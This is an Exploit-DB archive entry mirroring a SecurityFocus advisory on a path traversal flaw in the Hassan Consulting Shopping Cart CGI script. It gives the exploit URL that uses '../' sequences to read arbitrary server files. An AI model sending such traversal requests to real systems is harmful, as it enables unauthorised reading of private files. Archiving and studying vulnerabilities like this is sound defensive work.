exploit-db-mirror/exploits/cgi/remote/20281.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

7 lines
No EOL
420 B
Text

source: https://www.securityfocus.com/bid/1777/info
The $page variable in Hassan Consulting Shopping Cart does not properly check for insecure relative paths such as the double dot "..". Therefore, requesting the following URL will display the specified file:
http://target/cgi-bin/shop.cgi/page=../../../path/filename.ext
Successful exploitation could lead to a remote intruder gaining read access to any known file.